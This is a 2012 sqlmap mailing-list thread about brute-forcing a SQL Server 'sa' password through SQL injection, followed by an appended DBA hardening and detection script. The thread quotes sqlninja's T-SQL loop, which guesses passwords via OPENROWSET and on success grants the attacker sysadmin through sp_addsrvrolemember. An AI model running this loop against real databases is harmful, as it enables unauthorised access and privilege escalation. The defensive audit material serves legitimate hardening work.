Re: [sqlmap-users] bruteforce SA password using SQL INJECTION
From: Bernardo D. A. G. <ber...@gm...> - 2012-07-25 10:44:39
Hi Juan,

master.dbo.xp_execresultset is a stored extended procedure available on
Microsoft SQL Server 2000. It is not available on MSSQL 2005/2008 onwards
by default, hence the error message and the DBA brute force attack fails.

Bernardo

On 24 July 2012 14:26, juan molina <j.m...@gm...> wrote:
> I was trying sqlninja.
>
> This is the query it uses to bruteforce the SA password with 1 character
> (numbers and letters).
>
> declare @p nvarchar(99),@z nvarchar(10),@s nvarchar(99), @a int, @q nvarchar(4000)
> set @a=1
> set @s=N'abcdefghijklmnopqrstuvwxyz0123456789'
> while @a<37
> begin
>   set @p=N''
>   set @z = substring(@s,@a,1)
>   if @z='''' set @z=''''''
>   set @p=@p+@z
>   set @q=N'select 1 from OPENROWSET(''SQLOLEDB'',''Network=DBMSSOCN;Address=;uid=sa;pwd='+@p+N''',''select 1;exec master.dbo.sp_addsrvrolemember '''''+system_user+N''''',''''sysadmin'''' '')'
>   exec master.dbo.xp_execresultset @q,N'master'
>   set @a=@a+1
> end
> set @a=1
>
> But I am receiving this error:
>
> Could not find stored procedure 'master.dbo.xp_execresultset'.
>
> It was in the HTTP response. Is this error because "openrowset" is
> disabled, or is it just that the "SA" password is not correct (like a
> "password wrong" error)?
>
> Is there any way to check if "openrowset" is enabled?
>
> Thanks.
>
> On Fri, Jul 20, 2012 at 5:02 AM, Bernardo Damele A. G.
> <ber...@gm...> wrote:
>>
>> Hi Juan,
>>
>> Microsoft SQL Server has a built-in function called OPENROWSET to
>> query another DBMS (or the DBMS itself). Back in 2002 Chris Anley
>> released a paper demonstrating how to abuse this function to perform a
>> DBMS user's password brute-force attack within the MSSQL instance. A
>> few years later the attack has been automated in sqlninja[1].
>> We have an issue open on GitHub[2] to implement the same DBA password
>> brute-force attack. We have the required code in place, see issue
>> #34[3], and will soon close the whole thing.
>>
>> However, OPENROWSET is enabled by default on MSSQL 2000. From MSSQL
>> 2005 RTM it is disabled by default, hence either the database
>> administrator has manually enabled it, or you won't be able to abuse
>> this function to brute-force the 'sa' (DBA) password hash or run
>> statements on his behalf.
>>
>> [1] http://sqlninja.sourceforge.net
>> [2] https://github.com/sqlmapproject/sqlmap/issues/31
>> [3] https://github.com/sqlmapproject/sqlmap/issues/34
>>
>> Regards,
>> Bernardo
>>
>>
>> On 20 July 2012 12:14, juan molina <j.m...@gm...> wrote:
>> > Is there a way to bruteforce the SA password using SQL INJECTION?
>> >
>> > This is the scenario: it is a database server (SQL Server 2008) without
>> > access to the internet (it has the 1433 port blocked), and
>> > the current user is a normal user (low privileges user). I cannot get the SA
>> > password hash.
>> >
>> > The question is, is there any tool or code or way to bruteforce the SA
>> > password without direct access to the SQL Server?
>> >
>> > This is a request to add this functionality to SQLMAP; I don't know if it is
>> > possible.
>> >
>> > Thanks.
>> >
>> > _______________________________________________
>> > sqlmap-users mailing list
>> > sql...@li...
>> > https://lists.sourceforge.net/lists/listinfo/sqlmap-users
>>
>> --
>> Bernardo Damele A. G.
>>
>> E-mail / Jabber: bernardo.damele (at) gmail.com
>> Mobile: +447788962949 (UK 07788962949)

--
Bernardo Damele A. G.

E-mail / Jabber: bernardo.damele (at) gmail.com
Mobile: +447788962949 (UK 07788962949)
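Added example (editor's note, not part of the thread and not code from sqlmap or sqlninja): the DBA-side audit that settles the question raised above. It assumes SQL Server 2005 or later (sys.configurations and ALTER LOGIN do not exist on 2000) and a sysadmin session in SSMS or sqlcmd. It checks the engine version, shows whether the 'Ad Hoc Distributed Queries' option that governs OPENROWSET with inline connection strings is enabled, puts the instance back into the hardened default state, reviews the 'sa' login, and searches the error log for the failed 'sa' logins that an in-instance brute force of this kind leaves behind.

```sql
-- Added example (not from the thread, sqlmap or sqlninja). Run as sysadmin
-- on SQL Server 2005 or later.

-- 1. Engine version: xp_execresultset exists only on SQL Server 2000; on
--    2005+ the OPENROWSET technique discussed in the thread additionally
--    needs 'Ad Hoc Distributed Queries' to have been switched on.
SELECT SERVERPROPERTY('ProductVersion') AS product_version,
       SERVERPROPERTY('ProductLevel')   AS product_level;

-- 2. Is OPENROWSET with ad hoc connection strings enabled?
--    value_in_use = 0 is the default since 2005 RTM; 1 means someone
--    enabled it and the instance can connect back to itself.
SELECT name, value, value_in_use
FROM   sys.configurations
WHERE  name = N'Ad Hoc Distributed Queries';

-- 3. Hardened state: disable the option again (the advanced-options
--    flag must be on to change it; turn it back off afterwards).
EXEC sp_configure N'show advanced options', 1;
RECONFIGURE;
EXEC sp_configure N'Ad Hoc Distributed Queries', 0;
RECONFIGURE;
EXEC sp_configure N'show advanced options', 0;
RECONFIGURE;

-- 4. The 'sa' login: a password brute force is only worth anything if the
--    login is enabled. Check its state and policy flags; disable it once
--    a separately named sysadmin login is confirmed to exist.
SELECT name, is_disabled, is_policy_checked, is_expiration_checked
FROM   sys.sql_logins
WHERE  name = N'sa';
ALTER LOGIN sa DISABLE;   -- only after verifying another sysadmin login works

-- 5. Detection: every OPENROWSET guess is a genuine login attempt against
--    the instance, so with the default audit setting (failed logins only)
--    each wrong password is written to the SQL Server error log as
--    "Login failed for user 'sa'". Search the current log (0) of the
--    engine log type (1) for that pattern.
EXEC xp_readerrorlog 0, 1, N'Login failed', N'sa';
```

A burst of "Login failed for user 'sa'" entries whose source is the server's own address, rather than a client, is the signature of this technique being attempted through an injection point; step 2 returning 1 on a 2005+ instance is the configuration drift that makes it possible.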